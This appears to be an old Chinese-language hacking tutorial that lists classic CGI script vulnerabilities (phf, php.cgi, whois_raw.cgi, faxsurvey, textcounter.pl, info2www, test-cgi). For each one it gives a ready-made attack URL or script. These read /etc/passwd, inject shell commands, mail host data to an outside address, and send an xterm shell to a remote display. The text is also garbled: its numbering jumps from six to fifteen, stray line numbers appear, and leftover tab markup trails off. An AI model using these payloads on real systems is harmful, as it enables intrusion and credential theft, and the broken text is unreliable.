一.phf漏洞
这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:
lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
但是我们还能找到它吗?
二.php.cgi 2.0beta10或更早版本的漏洞
可以读nobody权限的所有文件.
lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd
/etc/security/passwd等.
三.whois_raw.cgi
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
四.faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
五.textcounter.pl
如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please DO modify this
$EMAIL='[email protected],root'; # please DO modify this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EMAIL} -sanothere_one";
}$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /$\{IFS\}/g;#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
#system({"lynx"} "lynx", $text);
六.一些版本(1.1)的info2www的漏洞
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami
;xterm
1<tab>-display<tab>danish:0<tab>-e<tab>/bin/sh|<tab>?data=Download
2注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.
3
4十五.test-cgi
5lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
6CGI/1.0 test script report:
7
8argc is 0. argv is .
9
10SERVER_SOFTWARE = NCSA/1.4B
11SERVER_NAME = victim.com
12GATEWAY_INTERFACE = CGI/1.1
13SERVER_PROTOCOL = HTTP/1.0
14SERVER_PORT = 80
15REQUEST_METHOD = GET
16HTTP_ACCEPT = text/plain, application/x-html, application/html,
17text/html, text/x-html
18PATH_INFO =
19PATH_TRANSLATED =
20SCRIPT_NAME = /cgi-bin/</tab></tab></tab></tab></tab>